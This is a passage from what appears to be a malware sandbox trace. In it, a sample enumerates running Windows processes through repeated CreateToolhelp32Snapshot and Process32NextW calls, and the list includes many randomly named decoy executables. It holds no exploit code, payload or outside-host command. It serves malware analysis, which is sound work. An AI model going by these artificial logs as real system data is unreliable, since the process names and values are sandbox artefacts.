cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0151.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.558] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0151.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.560] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0151.567] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0151.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0151.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0151.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0151.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.642] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0151.643] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.644] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.646] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0151.647] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.649] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.650] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.651] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0151.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.655] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.660] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.661] CloseHandle (hObject=0xc4) returned 1 [0151.661] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.667] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.668] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0151.760] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.761] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0151.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0151.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0151.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0151.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0151.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0151.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.787] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0151.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.859] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 